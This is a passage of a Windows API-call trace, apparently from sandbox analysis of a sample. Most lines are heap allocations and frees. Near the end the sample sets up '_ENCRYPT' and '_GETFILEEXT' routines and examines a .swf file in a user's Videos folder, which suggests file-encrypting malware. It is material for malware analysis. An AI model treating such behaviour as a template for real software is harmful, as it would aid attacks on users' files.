0x9bd7c8 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.065] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.067] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0198.067] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0198.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.068] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.069] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0198.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.069] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0198.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.070] CloseHandle (hObject=0x158) returned 1 [0198.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.070] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.071] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.071] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.071] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.071] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.071] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.071] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.071] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.071] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.071] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.071] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x5a7a7540, ftLastWriteTime.dwHighDateTime=0x1d5dd98, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="NsEh3.swf", cAlternateFileName="")) returned 0x90add8 [0198.072] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.072] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x5a7a7540, ftLastWriteTime.dwHighDateTime=0x1d5dd98, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="NsEh3.swf", cAlternateFileName="")) returned 0x90add8 [0198.072] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.072] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.072] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS 